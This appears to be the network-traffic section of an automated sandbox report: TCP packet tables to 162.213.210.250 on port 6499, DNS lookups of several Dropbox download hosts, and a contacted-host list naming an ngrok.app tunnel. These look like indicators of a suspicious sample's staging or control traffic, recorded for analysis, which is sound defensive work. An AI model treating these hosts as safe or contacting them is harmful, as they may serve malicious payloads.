                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.499633074 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.500118017 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.500231028 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.500241995 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.500314951 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.500315905 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.501084089 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.501214027 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.518943071 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.519565105 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.519619942 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.519687891 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.519700050 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.519740105 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.520334005 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.520487070 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.520498037 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.520543098 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.521203995 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.521253109 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.521409988 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.521420956 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.521464109 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.522073030 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.522162914 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.522175074 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.522226095 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.522623062 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.522670031 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.522703886 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.522715092 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.522754908 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.523403883 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.523467064 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.523482084 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.523518085 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.524133921 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.524179935 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.524215937 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.524229050 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.524434090 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.524939060 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.525053024 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.525064945 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.525109053 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.525743008 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.525782108 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.525922060 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.525933981 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.526000023 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.526526928 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.526818037 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.526865959 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.526941061 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.526954889 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.527018070 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.527709007 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.527797937 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.527808905 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.527856112 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.528553963 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.528616905 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.528625011 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.528637886 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.528683901 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.529246092 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.529346943 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.529360056 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.529402018 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.530029058 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.530097008 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.530147076 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.530159950 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.530203104 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.530644894 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.530710936 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.530721903 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.530760050 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.531265974 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.531303883 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.531383038 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.531475067 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.531513929 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.532109976 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.532234907 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.532247066 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.532272100 CET498346499192.168.2.4162.213.210.250
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.532927990 CET649949834162.213.210.250192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:22.532968998 CET498346499192.168.2.4162.213.210.250
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.305504084 CET5649953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.529500961 CET5503553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.535239935 CET6294753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.535389900 CET6499553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.710074902 CET5053253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.710342884 CET6039253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849838972 CET53505321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849864006 CET53550351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.850136042 CET53629471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.858146906 CET53649951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.943033934 CET53603921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.344784021 CET5409053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.344980001 CET6225353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.345784903 CET5979953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.346030951 CET6398053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.414722919 CET4926653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.415196896 CET5005053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481498957 CET53540901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481549025 CET53622531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481978893 CET53597991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.482808113 CET53639801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.551862001 CET53492661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.552150965 CET53500501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:38.959584951 CET5460253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.006038904 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.292480946 CET53546021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.349930048 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.962562084 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.091665983 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.091720104 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.091731071 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.091938972 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.276794910 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.486238003 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.488217115 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.489038944 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.495213985 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.542846918 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.802756071 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.802767038 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.802776098 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.802788019 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.805069923 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.805154085 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.808789015 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:40.853632927 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.118935108 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.151437998 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.458093882 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.630013943 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.630172968 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.630366087 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.630537033 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.635993004 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.637828112 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.644561052 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.773785114 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.783524990 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.784060001 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.952807903 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.952898979 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.952913046 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.952923059 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.953881025 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.953989029 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:41.958324909 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.098695040 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.101488113 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.101747990 CET44364069172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.105575085 CET64069443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.267622948 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.309087038 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.563918114 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.564023972 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.879048109 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.900409937 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.906881094 CET44359966162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:42.907636881 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.378638983 CET5725553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.720040083 CET53572551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.860472918 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:48.860589027 CET59966443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:49.175751925 CET44359966162.159.61.3192.168.2.4
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 10, 2024 18:41:34.699966908 CET | 192.168.2.4 | 1.1.1.1 | c298 | (Port unreachable) | Destination Unreachable
Dec 10, 2024 18:41:35.943108082 CET | 192.168.2.4 | 1.1.1.1 | c24a | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.446985960 CET1.1.1.1192.168.2.40x8d19No error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.432374954 CET1.1.1.1192.168.2.40x7667No error (0)uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.432374954 CET1.1.1.1192.168.2.40x7667No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.493679047 CET1.1.1.1192.168.2.40xe97fNo error (0)uc99c9846721962dead0990bdd22.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.493679047 CET1.1.1.1192.168.2.40xe97fNo error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.703061104 CET1.1.1.1192.168.2.40xf55cNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.703061104 CET1.1.1.1192.168.2.40xf55cNo error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.768965006 CET1.1.1.1192.168.2.40x8095No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.444860935 CET1.1.1.1192.168.2.40x77dfNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.549269915 CET1.1.1.1192.168.2.40x7ca4No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849838972 CET1.1.1.1192.168.2.40x86a2No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849838972 CET1.1.1.1192.168.2.40x86a2No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849864006 CET1.1.1.1192.168.2.40xa85No error (0)uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.849864006 CET1.1.1.1192.168.2.40xa85No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.850136042 CET1.1.1.1192.168.2.40x1c07No error (0)uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.850136042 CET1.1.1.1192.168.2.40x1c07No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.858146906 CET1.1.1.1192.168.2.40x8a9No error (0)uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:35.943033934 CET1.1.1.1192.168.2.40xafd5No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481498957 CET1.1.1.1192.168.2.40x80f9No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481498957 CET1.1.1.1192.168.2.40x80f9No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481549025 CET1.1.1.1192.168.2.40xfa26No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481978893 CET1.1.1.1192.168.2.40x39bfNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.481978893 CET1.1.1.1192.168.2.40x39bfNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.482808113 CET1.1.1.1192.168.2.40xf0f3No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.551862001 CET1.1.1.1192.168.2.40x40faNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.551862001 CET1.1.1.1192.168.2.40x40faNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:36.552150965 CET1.1.1.1192.168.2.40xcc99No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:38.705172062 CET1.1.1.1192.168.2.40x144eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:38.705172062 CET1.1.1.1192.168.2.40x144eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.292480946 CET1.1.1.1192.168.2.40x766aNo error (0)uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:39.292480946 CET1.1.1.1192.168.2.40x766aNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.720040083 CET1.1.1.1192.168.2.40x77ebNo error (0)uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:45.720040083 CET1.1.1.1192.168.2.40x77ebNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:32.469007015 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:32.469007015 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:33.463980913 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:33.463980913 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:34.475059032 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:34.475059032 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.490434885 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:36.490434885 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:40.492305994 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:42:40.492305994 CET1.1.1.1192.168.2.40x8dd1No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  • 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                  • www.dropbox.com
